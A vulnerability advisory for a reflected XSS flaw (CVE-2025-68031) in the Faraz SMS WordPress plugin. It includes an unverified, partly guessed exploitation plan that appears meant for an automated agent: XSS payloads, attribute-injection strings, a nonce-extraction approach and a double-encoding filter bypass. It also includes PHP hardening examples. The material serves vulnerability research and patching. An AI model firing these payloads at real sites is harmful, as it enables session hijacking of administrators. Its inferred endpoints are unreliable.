CVE-2025-68031

افزونه پیامک حرفه ای فراز اس ام اس <= 2.7.3 - Reflected Cross-Site Scripting

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.1
Patched in: Unpatched
Time to patch: N/A

Description

The افزونه پیامک حرفه ای فراز اس ام اس plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 2.7.3
Published: January 27, 2026
Last updated: February 2, 2026
Affected plugin: farazsms

Research Plan (status: Unverified)

This research plan targets CVE-2025-68031, a Reflected Cross-Site Scripting (XSS) vulnerability in the افزونه پیامک حرفه ای فراز اس ام اس (farazsms) plugin. Since the source code is not provided, this plan relies on common patterns in this plugin's architecture and standard WordPress XSS sinks.

1. Vulnerability Summary

The "Faraz SMS" plugin for WordPress fails to sufficiently sanitize and escape user-supplied input before reflecting it back into the web page. This allows an unauthenticated attacker to craft a malicious URL containing a JavaScript payload. When a victim (especially an authenticated administrator) clicks the link, the script executes in their browser context.

2. Attack Vector Analysis

  • Endpoint: Likely a frontend page where the plugin processes SMS subscription results, or a specific admin-ajax handler that returns HTML.
  • Vulnerable Parameter: Likely a feedback or status parameter such as message, msg, fsms_status, or phone (inferred).
  • Authentication: None (Unauthenticated).
  • Preconditions: The victim must be tricked into clicking a specially crafted link. If the reflection occurs on an admin page, the victim must be logged in as an administrator.

3. Code Flow (Inferred)

  1. Entry Point: A request is made to a URL containing a specific query parameter (e.g., wp-admin/admin.php?page=farazsms_settings&message=... or a frontend page like ?fsms_result=...).
  2. Processing: The plugin's initialization logic (hooked to init or admin_init) or a specific page callback retrieves the parameter using $_GET or $_REQUEST.
  3. Sink: The code calls echo or printf on the raw parameter without applying esc_html(), esc_attr(), or wp_kses().
    • Example Vulnerable Pattern: echo '<div class="updated"><p>' . $_GET['message'] . '</p></div>';
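As an added illustration (not code from the farazsms plugin or from this advisory), the inferred notice pattern above is shown beside two hardened forms: escaping at the sink, and the preferred approach of never reflecting free text at all. The admin_notices hook, the message parameter and the text domain are assumptions.

```php
<?php
// Added illustration, not code from the farazsms plugin. The hook name,
// the "message" parameter and the 'farazsms' text domain are assumptions.

// VULNERABLE (the pattern inferred in the research plan): the raw query
// parameter is concatenated straight into HTML, so "<script>" executes.
function fsms_notice_vulnerable() {
    if ( isset( $_GET['message'] ) ) {
        echo '<div class="updated"><p>' . $_GET['message'] . '</p></div>';
    }
}

// HARDENED, option 1: sanitize on input and escape at the sink. esc_html()
// turns <, >, &, " and ' into entities, so a reflected payload renders as text.
// (Inside an HTML attribute the matching escaper would be esc_attr().)
function fsms_notice_escaped() {
    if ( isset( $_GET['message'] ) ) {
        $message = sanitize_text_field( wp_unslash( $_GET['message'] ) );
        echo '<div class="updated"><p>' . esc_html( $message ) . '</p></div>';
    }
}

// HARDENED, option 2 (preferred for status feedback): the URL carries only a
// short key, and the displayed string comes from a fixed, translatable map.
// Nothing attacker-controlled ever reaches the page, even before escaping.
function fsms_notice_keyed() {
    $messages = array(
        'sent'    => __( 'SMS sent successfully.', 'farazsms' ),
        'failed'  => __( 'SMS could not be sent.', 'farazsms' ),
        'invalid' => __( 'Invalid phone number.', 'farazsms' ),
    );
    // sanitize_key() lowercases and strips everything but [a-z0-9_-].
    $key = isset( $_GET['message'] ) ? sanitize_key( wp_unslash( $_GET['message'] ) ) : '';
    if ( isset( $messages[ $key ] ) ) {
        echo '<div class="updated"><p>' . esc_html( $messages[ $key ] ) . '</p></div>';
    }
}

// Register the hardened callback; admin_notices is an assumed hook point,
// since the advisory does not name where the plugin emits its notice.
add_action( 'admin_notices', 'fsms_notice_keyed' );
```

Option 2 also removes the reflection from a detection standpoint: a request whose message value is not one of the known keys simply produces no notice.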

4. Nonce Acquisition Strategy

Reflected XSS via GET parameters typically occurs before or independently of nonce checks. However, if the reflection occurs within an AJAX response or a form submission that does require a nonce, use the following strategy:

  1. Identify Shortcodes: Search for plugin shortcodes:
    grep -r "add_shortcode" /var/www/html/wp-content/plugins/farazsms/
    (Commonly [farazsms_newsletter] or [farazsms_verification]).
  2. Create Setup Page: Create a page containing the found shortcode:
    wp post create --post_type=page --post_status=publish --post_content='[SHORTCODE_NAME]'
  3. Extract Nonce:
    • Navigate to the newly created page.
    • Use browser_eval to find the localization object.
    • Look for variables like window.farazsms_ajax?.nonce or window.fsms_obj?.ajax_nonce.

5. Exploitation Strategy

The goal is to find a reflected parameter and execute alert(document.domain).

Step 1: Discovery (Grep for Sinks)

Run these commands in the plugin directory to find the exact vulnerable line:

# Search for raw echoes of GET/REQUEST parameters
grep -rP "echo\s+\\\$_(GET|REQUEST)" /var/www/html/wp-content/plugins/farazsms/
grep -rP "printf\(.*\\\$_(GET|REQUEST)" /var/www/html/wp-content/plugins/farazsms/

Step 2: Payload Construction

Based on the discovery, construct a URL. If the sink is inside an HTML tag attribute, use:
"><script>alert(document.domain)</script>
If the sink is inside a <div> or <p>, use:
<script>alert(document.domain)</script>

Step 3: Request Execution

Use the http_request tool to simulate a victim clicking the link.

  • Method: GET
  • URL: http://localhost:8080/[VULNERABLE_PAGE]?[VULNERABLE_PARAM]=%3Cscript%3Ealert(document.domain)%3C/script%3E

6. Test Data Setup

  1. Install Plugin: Ensure farazsms version <= 2.7.3 is installed and active.
  2. Configuration: Some XSS reflections only occur if certain settings are enabled (e.g., "Show success message after subscription").
  3. Create Victim User:
    wp user create victim victim@example.com --role=administrator --user_pass=password

7. Expected Results

  • The HTTP response body must contain the literal, unescaped string <script>alert(document.domain)</script>.
  • If using browser_navigate, the browser should trigger an alert dialog (observable via console logs or screenshots).

8. Verification Steps

  1. Source Verification:
    curl -s "http://localhost:8080/?vulnerable_param=<script>alert(1)</script>" | grep "<script>alert(1)</script>"
  2. Context Check: Verify if the script is reflected inside a sensitive area (like the WordPress Admin Dashboard) which would allow for session hijacking or unauthorized administrative actions.

9. Alternative Approaches

  • Attribute Injection: If the input is reflected inside an attribute (e.g., <input value="[INPUT]">), try:
    " onmouseover="alert(1)" or " autofocus onfocus="alert(1)"
  • Admin-Ajax Reflection: Check if admin-ajax.php actions reflect input in their error/success responses:
    # Example (inferred)
    http_request(
        method="POST",
        url="http://localhost:8080/wp-admin/admin-ajax.php",
        body="action=farazsms_test&msg=<script>alert(1)</script>",
        headers={"Content-Type": "application/x-www-form-urlencoded"}
    )
  • Double Encoding: If a simple payload is blocked, try URL-encoding the payload twice to bypass basic security filters.

Research Findings
Status: static analysis, not yet PoC-verified

Summary

The افزونه پیامک حرفه ای فراز اس ام اس (Faraz SMS) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to 2.7.3. This occurs because the plugin fails to sanitize and escape user-supplied input from URL parameters before reflecting it in the page, allowing unauthenticated attackers to execute arbitrary JavaScript in a victim's browser.

Exploit Outline

The exploit involves identifying a plugin-generated page (either in the WordPress admin dashboard or a frontend form) that reflects query parameters back into the HTML. An attacker crafts a malicious URL containing a JavaScript payload—such as `<script>alert(document.domain)</script>`—within a parameter like 'message', 'msg', or 'fsms_status'. The attacker then tricks an authenticated user (typically an administrator) into clicking the link, causing the script to execute in the context of the victim's session, which could lead to unauthorized actions or cookie theft.
